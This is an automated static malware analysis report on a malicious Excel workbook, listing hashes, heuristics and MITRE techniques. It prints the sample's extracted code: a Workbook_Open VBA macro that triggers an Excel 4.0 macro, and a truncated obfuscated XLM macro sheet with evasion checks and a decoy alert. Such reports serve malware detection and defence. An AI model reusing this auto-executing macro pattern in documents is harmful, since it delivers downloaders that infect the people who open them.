Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d641549ad84e50fa…

MALICIOUS

Office (OOXML)

71.8 KB Created: 2021-03-08 21:21:46 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: b40341e6bf1e6e36a3af2292f05e19b6 SHA-1: f8f0077a5b25bf08b69c5bad6dcb90643a780d36 SHA-256: d641549ad84e50fa81d091a3d6979ba8a197f81e9e99d0fa70b545be7c58de42
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel document containing both VBA and Excel 4.0 (XLM) macros. The Workbook_Open VBA macro calls ExecuteExcel4Macro, which in turn executes the XLM function 'SecureDocument1!ItsFine()'. This function is known to be used to download and execute arbitrary code, indicating a downloader or dropper functionality. The critical heuristics for XLM macros and dangerous API usage confirm this malicious intent.

Heuristics 6

  • Excel 4.0 macro sheet (1 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: GOTO, FORMULA critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 714 bytes
SHA-256: fcbc8996931ae687f6b0a75c941d9415f3ea35e1911235777a45ba998db530c8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Workbook_Open()
 ExecuteExcel4Macro ("SecureDocument1!ItsFine()")
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 12288 bytes
SHA-256: 34ced3173ea47738d3c29004d34926a5da6c1393c9fe69c376cf529fc37eb712
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 79478 bytes
SHA-256: 8620e070d18ddf59d55aa35b28e8f7e372e1ab279591a467dbd5d7e42187c618
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{EE893509-E7EC-4ABC-AC04-97D1A1A279FF}"><dimension ref="A1:CB210"/><sheetViews><sheetView showFormulas="1" tabSelected="1" workbookViewId="0"><selection activeCell="C4" sqref="C4"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="9.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="9.7109375" style="8"/><col min="2" max="20" width="9.7109375" style="6"/><col min="21" max="26" width="9.7109375" style="5"/><col min="27" max="27" width="9.7109375" style="9"/><col min="28" max="29" width="9.7109375" style="7"/><col min="30" max="40" width="9.7109375" style="8"/><col min="41" max="54" width="9.7109375" style="6"/><col min="55" max="55" width="9.7109375" style="8" customWidth="1"/><col min="56" max="56" width="51.85546875" style="8" hidden="1" customWidth="1"/><col min="57" max="57" width="9.7109375" style="8" hidden="1" customWidth="1"/><col min="58" max="58" width="1.140625" style="8" hidden="1" customWidth="1"/><col min="59" max="60" width="9.7109375" style="8" hidden="1" customWidth="1"/><col min="61" max="61" width="0.7109375" style="8" hidden="1" customWidth="1"/><col min="62" max="64" width="9.7109375" style="8" hidden="1" customWidth="1"/><col min="65" max="80" width="9.7109375" style="6" hidden="1" customWidth="1"/><col min="81" max="16384" width="9.7109375" style="6"/></cols><sheetData><row r="1" spans="1:63" x14ac:dyDescent="0.25"><c r="A1" s="11" t="e"><f>GOTO(A2)</f><v>#N/A</v></c><c r="U1" s="9" t="b"><f>SET.VALUE(V1,RANDBETWEEN(1,10))</f><v>1</v></c><c r="V1" s="9"><v>0</v></c><c r="W1" s="9" t="b"><f>FORMULA(V1,SecureDocument!B2)</f><v>1</v></c><c r="X1" s="9" t="b"><f>SET.VALUE(V1,"")</f><v>1</v></c><c r="AA1" s="9" t="b"><f>ALERT("Upadting Calcuations")</f><v>1</v></c><c r="AN1" s="8" t="s"><v>32</v></c><c r="BD1" s="7" t="b"><f>IF(SEARCH("Windows",EVALUATE(BH11&amp;BG13&amp;BH12&amp;BG11&amp;BK1&amp;BG12)),GOTO(BD2),FILE.CLOSE(FALSE))</f><v>1</v></c><c r="BE1" s="7"/><c r="BF1" s="7"/><c r="BG1" s="7"/><c r="BH1" s="7"/><c r="BI1" s="7"/><c r="BJ1" s="7"/><c r="BK1" s="7"><v>1</v></c></row><row r="2" spans="1:63" x14ac:dyDescent="0.25"><c r="A2" s="8" t="b"><f>GOTO(AA1)</f><v>1</v></c><c r="U2" s="9" t="b"><f t="shared" ref="U2:U65" si="0">SET.VALUE(V2,RANDBETWEEN(1,10))</f><v>1</v></c><c r="V2" s="9"><v>0</v></c><c r="W2" s="9" t="b"><f>FORMULA(V2,SecureDocument!B3)</f><v>1</v></c><c r="X2" s="9" t="b"><f t="shared" ref="X2:X65" si="1">SET.VALUE(V2,"")</f><v>1</v></c><c r="AA2" s="9" t="b"><f>GOTO(U1)</f><v>1</v></c><c r="BD2" s="7" t="b"><f>IF(EVALUATE(BH11&amp;BG13&amp;BH12&amp;BG11&amp;BK2&amp;BG12),FILE.CLOSE(FALSE),GOTO(BD3))</f><v>1</v></c><c r="BE2" s="7"/><c r="BF2" s="7"/><c r="BG2" s="7"/><c r="BH2" s="7"/><c r="BI2" s="7"/><c r="BJ2" s="7"/><c r="BK2" s="7"><v>31</v></c></row><row r="3" spans="1:63" x14ac:dyDescent="0.25"><c r="A3" s="8" t="e"><f>GOTO(StuffyStuff)</f><v>#N/A</v></c><c r="U3" s="9" t="b"><f t="shared" si="0"/><v>1</v></c><c r="V3" s="9"><v>0</v></c><c r="W3" s="9" t="b"><f>FORMULA(V3,SecureDocument!B4)</f><v>1</v></c><c r="X3" s="9" t="b"><f t="shared" si="1"/><v>1</v></c><c r="AL3" s="8" t="s"><v>28</v></c><c r="BD3" s="7" t="b"><f>IF(EVALUATE(BH11&amp;BG13&amp;BH13&amp;BG11&amp;BK3&amp;BG12),FILE.CLOSE(FALSE),GOTO(BD4))</f><v>1</v></c><c r="BE3" s="7"/><c r="BF3" s="7"/><c 
... (truncated)